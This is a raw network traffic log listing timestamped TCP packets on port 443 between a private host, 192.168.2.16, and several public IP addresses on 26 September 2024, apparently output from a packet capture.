Sep 26, 2024 17:55:28.089345932 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.095091105 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.095124960 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.095180988 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.095197916 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.095258951 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.096055984 CEST	49746	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.100992918 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.102153063 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.102397919 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.102411985 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.103410006 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.103492975 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.103751898 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.103813887 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.103887081 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.103894949 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.107063055 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.107095003 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.107134104 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.107147932 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.107204914 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.113070011 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.119102955 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.119132996 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.119191885 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.119205952 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.119266987 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.121974945 CEST	443	49747	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.122257948 CEST	49747	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.122272968 CEST	443	49747	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.123127937 CEST	443	49747	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.123226881 CEST	49747	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.123574972 CEST	49747	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.123626947 CEST	443	49747	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.123788118 CEST	49747	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.123795986 CEST	443	49747	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.125123978 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.145236015 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.145279884 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.145315886 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.145332098 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.145380974 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.145386934 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.145529985 CEST	49754	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:28.145570040 CEST	443	49754	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:28.145644903 CEST	49754	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:28.145742893 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.145792961 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.145798922 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.146456003 CEST	49754	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:28.146471977 CEST	443	49754	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:28.149281979 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.149367094 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.149374008 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.153745890 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.153808117 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.153814077 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.153842926 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.153892040 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.153898001 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.158271074 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.158346891 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.158353090 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.159188032 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.162547112 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.162606001 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.162611008 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.169787884 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.169843912 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.169856071 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.171475887 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.171529055 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.171535015 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.175182104 CEST	49747	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.176980972 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.177078962 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.177108049 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.180697918 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.180787086 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.180798054 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.184969902 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.185055971 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.185065031 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.189445019 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.189517975 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.189534903 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.193747044 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.193821907 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.193839073 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.198167086 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.198241949 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.198261976 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.202677965 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.202753067 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.202766895 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.207259893 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.207324982 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.207335949 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.211592913 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.211663961 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.211679935 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.216036081 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.216100931 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.216113091 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.220192909 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.220248938 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.220269918 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.223558903 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.223890066 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.223903894 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.227540970 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.227602005 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.227611065 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.233784914 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.233859062 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.233870983 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.235317945 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.235377073 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.235390902 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.237664938 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.237720966 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.237732887 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.240067959 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.240124941 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.240132093 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.242912054 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.242973089 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.242980957 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.244898081 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.244976997 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.244983912 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.246879101 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.246946096 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.246952057 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.302234888 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.302253962 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.334197998 CEST	49673	443	192.168.2.16	204.79.197.203
Sep 26, 2024 17:55:28.350200891 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.382636070 CEST	49756	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.382690907 CEST	443	49756	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.382836103 CEST	49756	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.383049965 CEST	49756	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.383060932 CEST	443	49756	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.398602009 CEST	49757	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.398649931 CEST	443	49757	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.398749113 CEST	49757	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.398977041 CEST	49757	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.398988962 CEST	443	49757	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.493746996 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.494179010 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.494206905 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.494225979 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.494229078 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.494250059 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.494275093 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.495054960 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.495093107 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.495100021 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.495110035 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.495142937 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.495167971 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.495173931 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.495206118 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.495995998 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.496047974 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.496088982 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.496095896 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.496855021 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.496880054 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.496902943 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.496908903 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.496948004 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.496949911 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.496961117 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.496994972 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.497000933 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.497740030 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.497773886 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.497782946 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.497790098 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.497816086 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.497826099 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.497832060 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.497875929 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.497878075 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.497886896 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.497915983 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.497920990 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.498665094 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.498687983 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.498708963 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.498714924 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.498747110 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.499521017 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.499557018 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.499594927 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.499599934 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.499774933 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.499835014 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.499881029 CEST	49745	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.499907970 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.500402927 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.500413895 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.500436068 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.500458956 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.500458956 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.500462055 CEST	49745	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.500468969 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.500483990 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.500504017 CEST	49745	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.501121998 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.501168013 CEST	49745	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.501183033 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.501693964 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.501739025 CEST	49745	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.501754045 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.502302885 CEST	49745	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.502342939 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.502403021 CEST	49745	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.503623962 CEST	443	49746	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.503667116 CEST	443	49746	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.503725052 CEST	49746	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.503751993 CEST	443	49746	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.503766060 CEST	443	49746	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.503820896 CEST	49746	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.503822088 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.503876925 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.503906965 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.503925085 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.503936052 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.503973961 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.503981113 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.504548073 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.504586935 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.504595041 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.504609108 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.504641056 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.504645109 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.504656076 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.504707098 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.504714012 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.504802942 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.505347013 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.505399942 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.505407095 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.505636930 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.505673885 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.505676985 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.505693913 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.505733013 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.505752087 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.505796909 CEST	443	49747	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.505806923 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.505846977 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.505846977 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.505863905 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.505901098 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.505913019 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.506582975 CEST	443	49747	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.506613016 CEST	443	49747	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.506620884 CEST	49746	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.506632090 CEST	49747	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.506638050 CEST	443	49747	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.506644011 CEST	443	49746	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.506649017 CEST	443	49747	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.506675959 CEST	443	49749	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.506686926 CEST	49747	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.506721020 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.506743908 CEST	443	49747	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.506762028 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.506774902 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.506797075 CEST	49747	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.507369041 CEST	49749	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.507394075 CEST	443	49749	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.507580042 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.507610083 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.507622957 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.507635117 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.507671118 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.507704973 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.507711887 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.507755041 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.507791996 CEST	443	49749	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.508156061 CEST	49749	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.508290052 CEST	443	49749	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.508310080 CEST	49749	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.508424044 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.508467913 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.508492947 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.508516073 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.508516073 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.508527994 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.508564949 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.508573055 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.508614063 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.509090900 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.509135008 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.509160042 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.509181023 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.509188890 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.509223938 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.509231091 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.510123968 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.510159969 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.510181904 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.510201931 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.510210991 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.510235071 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.510360956 CEST	49747	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.510375023 CEST	443	49747	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.510900974 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.510936022 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.510946035 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.510955095 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.510998011 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.511003971 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.511009932 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.511054039 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.511059999 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.511106014 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.511132002 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.511154890 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.511159897 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.511168957 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.511193037 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.511850119 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.511873960 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.511897087 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.511928082 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.511933088 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.511940956 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.511953115 CEST	49736	443	192.168.2.16	142.250.186.132
